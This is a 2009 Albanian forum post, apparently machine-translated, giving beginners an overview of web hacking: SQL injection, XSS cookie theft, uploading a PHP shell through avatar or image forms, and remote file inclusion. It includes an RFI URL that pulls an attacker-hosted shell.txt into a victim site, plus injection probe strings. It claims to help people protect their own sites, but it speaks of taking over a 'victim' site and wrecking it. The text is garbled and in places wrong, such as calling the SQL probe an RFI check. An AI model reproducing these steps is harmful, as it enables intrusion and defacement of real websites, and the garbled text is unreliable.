Unë do të diskutojë disa më të përdorur web piraterie teknikat hakerat e cila ndihmon në çdo faull website. Kjo do t\'ju ndihmojë për të shpëtuar \"faqen tuaj!
1. SQL injeksion
2. XSS
3. Shell
4. RFI
5. Ka disa më shumë, por ata janë TOOO i madh për t\'u diskutuar në këtu.
________________________________________________________________________________________
1. SQL injeksion:
Shumë nga faqet e internetit këto ditë janë të lidhur në një SQL Database. Cilat i ndihmon ata për të ruajtur përdoruesve dhe fjalëkalimet [Encrypted] kur një mysafir regjistrave të tyre website. SQL databazë proceset një querie everytime një përdorues logs in. Ai shkon ne bazen e te dhenave, validates password, nëse e tij korrekt atëherë ai do të ketë në shkrimet e përdoruesit dhe pastaj në qoftë se ai nuk jep ndonjë gabim.
Pra themelore ekzekutuese funda është një komandë të parase një pyetje në bazën e të dhënave, në përpjekje për të shfrytëzuar informacion internetit e bazës së të dhënave. I really cant vënë të gjithë tutorial rreth sepse kjo është mënyra më të komplikuar për të kollitem faqen e internetit!
PS: - Nëse doni të kontrolloni nëse YOUR website është e ndjeshme ndaj RFI bashkëngjitni apo jo pastaj të bëjë të mëposhtme.
Nëse site\'s URL është:
webi.com / index.php? id = 545
vetëm të shtoni një \"si kjo në fund
webi.com / index.php? id = 545 \'
_____________________________________________________
2. XSS:
XSS bukur është një tjetër mënyrë për të hack disa website. Supozoni nëse disa website / forum është lejuar HTML në psot ose artikuj, atëherë një Haker mund të postoj një qëllim të keq në alfabetin e përmbajtjes. Pra, sa herë që një përdorues hap një faqe, të cookie-t do të dërgohet në Haker. Kështu që ai mund të identifikohem se si përdorues dhe f * ck up faqen e internetit.
3. SHELL:
Shell është një qëllim të keq. Php script. Çfarë keni për të bërë është, të gjejnë një vend në ndonjë website ku ju mund te ngarkoni ndonjë fotografi si avatars, recepie, truket tuaj, tuaja feedbacks. Dhe ju provoni ta ngarkoni fotografi tuaj shell nga atje. Dhe nëse i ngarkuar së saj pastaj Whoa! Keni hapur nga URL bar dhe u mund ta shohin të gjithë \"FTP\" llogari e që webhosting. Ju mund të riemërtoni / edit / upload / download duan asgjë u përfshirë indeksi faqe.
Kjo është gjithashtu e njohur si fshij.
4. RFI:
RFI është një mënyrë e mirë për të fshij një website. Ajo është përdorur me shell. Supozoni keni ngarkuar tuaj në shell:
webi.com / shell.txt
dhe keni gjetur një të prekshme për të RFI site ... pastaj mund të bëni ju si vijon:
webi.com / index.php? faqe = yousite.com / shell.txt
Kjo do të japë përsëri në qasjen e juaj viktimės faqet e FTP, thjesht si predhë, që
kështu të mund f * ck up çdo gjë që dëshironi.
PS: - Nëse doni të kontrolloni nëse YOUR website është e ndjeshme ndaj RFI bashkëngjitni apo jo pastaj të bëjë të mëposhtme.
Nëse site\'s URL është:
webi.com / index.php? id = 545
vetëm të shtoni diçka e tillë në fund
webi.com / index.php? id =
http://www.google.comDhe në qoftë se ajo incldes e google faqe ne faqen tuaj, që do të thotë të prekshme të saj të RFI.
Thu Dec 03, 2009 8:44 pm nga Ibish_sakica
Calendar
Titulli: Web hacking metodat per fillestar 
